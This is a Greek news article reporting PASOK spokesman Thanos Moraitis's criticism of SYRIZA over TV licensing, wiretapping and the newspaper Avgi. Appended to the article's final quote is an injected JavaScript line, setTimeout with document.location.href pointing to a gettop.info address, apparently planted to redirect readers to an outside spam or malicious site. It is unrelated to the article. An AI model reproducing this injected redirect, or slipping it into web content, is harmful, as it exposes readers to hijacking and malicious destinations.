Μωραΐτης: Παραβιάσεις προσωπικών δεδομένων με μεθόδους μαφίας

0
11
O βουλευτής του ΠΑΣΟΚ Θάνος Μωραϊτης κατά την ομιλία του στην Ολομέλεια της Βουλής στη συζήτηση επί της προτάσεως του πρωθυπουργού για την παροχή ψήφου εμπιστοσύνης προς την κυβέρνηση, Αθήνα, Πέμπτη 9 Οκτωβρίου 2014 ΑΠΕ - ΜΠΕ/ΑΠΕ - ΜΠΕ/Αλέξανδρος Μπελτές

 

Ο γραμματέας Επικοινωνίας του ΠΑΣΟΚ, Θάνος Μωραΐτης, μιλώντας στην ΕΡΤ, αναφέρθηκε στις τελευταίες εξελίξεις στο θέμα των τηλεοπτικών αδειών και της απόφασης του ΣτΕ, κάνοντας λόγο για πρωτοφανή γεγονότα.

«Ζήσαμε προτροπές και παρεμβάσεις στη Δικαιοσύνη, υποκλοπές και αποκαλύψεις κλειδαρότρυπας, παραβιάσεις προσωπικών δεδομένων με μεθόδους μαφίας», είπε και σχολίασε τη στάση της «Αυγής» στο πρωτοσέλιδό της για το μέλος του ΣτΕ:

«Είναι λυπηρό που μια ιστορική εφημερίδα της Αριστεράς, την οποία έχουν διευθύνει, κατά το παρελθόν, ο Λεωνίδας Κύρκος, o Γρηγόρης Γιάνναρος, ο Σοφιανός Χρυσοστομίδης, κάποιοι να την καταντούν σήμερα ένα κίτρινο έντυπο».

O κ. Μωραΐτης υποστήριξε ότι «ο ΣΥΡΙΖΑ αντί να επιδιώξει τη συναίνεση, επιχείρησε να διαμορφώσει ένα νέο τηλεοπτικό τοπίο, με μοναδικό στόχο να ελέγξει την ενημέρωση».

Όπως είπε χαρακτηριστικά, «φεύγουμε από ένα τηλεοπτικό τοπίο που διαμορφώθηκε επί τρεις δεκαετίες με όρους διαπλοκής και τώρα θέλουν να διαμορφώσουν ένα άλλο τοπίο με όρους μαφίας. Και στις δυο αυτές περιόδους θα κυριαρχήσουν οι αεριτζήδες και οι μεταπράτες». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here